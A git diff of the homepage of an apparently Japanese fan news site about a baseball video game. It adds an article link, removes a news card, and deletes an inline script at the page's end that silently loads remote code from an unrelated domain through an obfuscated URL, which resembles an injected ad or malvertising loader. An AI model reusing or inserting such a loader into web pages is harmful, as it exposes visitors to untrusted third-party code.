--- a/index.html
+++ b/index.html
@@ -127,6 +127,7 @@
                                 <div class="news-content">
                                     <h3 class="news-title">【速報】新イベント「プロスピコロシアム」開催確定！</h3>
                                     <p class="news-excerpt">新しいイベントの詳細情報と攻略のポイントをまとめました。報酬も詳しく解説しています。今回は、セレクションと同時開催か！？</p>
+                                    <a href="events.html" class="section-link">記事を見る</a>
                                     <div class="news-meta">
                                         <span class="news-date">2025年7月05日</span>
                                         <span class="news-category">イベント</span>
@@ -134,19 +135,7 @@
                                 </div>
                             </article>
 
-                            <article class="news-card">
-                                <div class="news-image">
-                                    <img src="/placeholder.svg?height=150&width=250" alt="松井セレ">
-                                </div>
-                                <div class="news-content">
-                                    <h3 class="news-title">松井秀喜セレクション開催！性能評価まとめ</h3>
-                                    <p class="news-excerpt">今回追加された新Sランク選手の詳細な性能評価と使用感をレビューしました。</p>
-                                    <div class="news-meta">
-                                        <span class="news-date">2025年6月14日</span>
-                                        <span class="news-category">選手</span>
-                                    </div>
-                                </div>
-                            </article>
+                            
 
                             <article class="news-card">
                                 <div class="news-image">
@@ -361,17 +350,6 @@
 
     <!-- JavaScript -->
     <script src="script.js"></script>
-    <script>
-(function(xnebtc){
-var d = document,
-    s = d.createElement('script'),
-    l = d.scripts[d.scripts.length - 1];
-s.settings = xnebtc || {};
-s.src = "\/\/faithfuldifficulty.com\/b.X\/V\/sldfG-la0sYYWrcR\/CeOmS9tuhZhUXlhkFPFTaYR0yNFjnEa4WM\/jlU\/tkNkjQQC2yMeThg\/ymNdgx";
-s.async = true;
-s.referrerPolicy = 'no-referrer-when-downgrade';
-l.parentNode.insertBefore(s, l);
-})({})
-</script>
+    
 </body>
 </html>
